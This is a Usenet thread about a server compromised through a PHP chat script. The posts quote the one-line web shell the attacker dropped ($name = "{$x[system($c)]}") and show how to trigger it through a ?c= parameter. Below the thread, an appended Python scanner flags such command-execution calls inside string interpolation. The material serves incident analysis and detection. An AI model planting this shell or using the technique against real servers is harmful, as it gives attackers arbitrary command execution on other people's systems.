Posted by Sandman on 12/08/60 11:57
In article <1157450070.312008.144490@m79g2000cwm.googlegroups.com>,
"Oski" <oski@gmx.de> wrote:
> Hello,
>
> our server got hacked through a security hole in an open source php
> chat script.
> (nothing new so far, ok!)
>
> This chat script allowed the user to create a new php script on our
> server, with the following content: (the code between the two "..."
> from the hacker):
>
> <?
> $name = "{$x[system($c)]}";
> // some more lines omitted ...
> ?>
>
> save these lines as e.g. /sys.php and call it with your browser:
> http://localhost/sys.php?c=ls
> and you can execute any system command and see the results!
>
> But: How does it work? The content of a variable being executed and
> written to the browser?
> If it were just "system($c)" then I understood.
Well, it's odd. system() returns the last line of output if
successful. But in this case, $name is set to the value of $x where
the key is the last line of the output. Is there any $x declaration in
the script?
For instance, this:
<?
$x["var"] = "foobar";
$c = "ls";
$name = "{$x[system($c)]}";
print "Value: $name";
?>
Outputs, after a long list of directories in my root directory (where
'var' is the last):
Value: foobar
So, "var" is the last directory in the ls listing. And the value of
$x["var"] is "foobar", which is assigned to $name.
Why? I have no idea. I'd have to see the entire script for that.
--
Sandman[.net]
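
Added example (not part of the posts above and not code from the chat script): a heuristic Python check that flags PHP source in which a command-execution function is called inside "{$...}" string interpolation, the form used in the sys.php file quoted in the thread. The function list, all names and both sample files are assumptions constructed for illustration, and the string matching is a regex approximation rather than a PHP parser.

```python
import re

# PHP functions that run OS commands (illustrative list, not exhaustive).
DANGEROUS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")

# A double-quoted PHP string literal, honouring backslash escapes.
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
# A call to one of the listed functions; \b keeps curl_exec() etc. out.
CALL = re.compile(r"\b(" + "|".join(DANGEROUS) + r")\s*\(", re.I)

def brace_expressions(body):
    """Yield each {$ ... } interpolation expression found in a string body."""
    i = 0
    while (start := body.find("{$", i)) != -1:
        depth, j = 0, start
        while j < len(body):            # walk to the matching closing brace
            if body[j] == "{":
                depth += 1
            elif body[j] == "}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        yield body[start:j + 1]
        i = j + 1

def scan_php(source):
    """Return (line, function, expression) for each suspicious interpolation."""
    findings = []
    for m in DQ_STRING.finditer(source):
        line = source.count("\n", 0, m.start()) + 1
        for expr in brace_expressions(m.group(1)):
            hit = CALL.search(expr)
            if hit:
                findings.append((line, hit.group(1).lower(), expr))
    return findings

# Constructed sample: the lines quoted in the thread.
SAMPLE_DROPPED = '<?\n$name = "{$x[system($c)]}";\n?>\n'
# Constructed sample: ordinary interpolation with no function call.
SAMPLE_OK = '<?php\n$x["var"] = "foobar";\n$name = "{$x[\'var\']}";\nprint "Value: $name";\n?>\n'

if __name__ == "__main__":
    for name, src in (("dropped", SAMPLE_DROPPED), ("ok", SAMPLE_OK)):
        print(name, scan_php(src))
```

Run over a web root, a hit in a file nobody on the team wrote is a reason to inspect that file and the script that was able to create it.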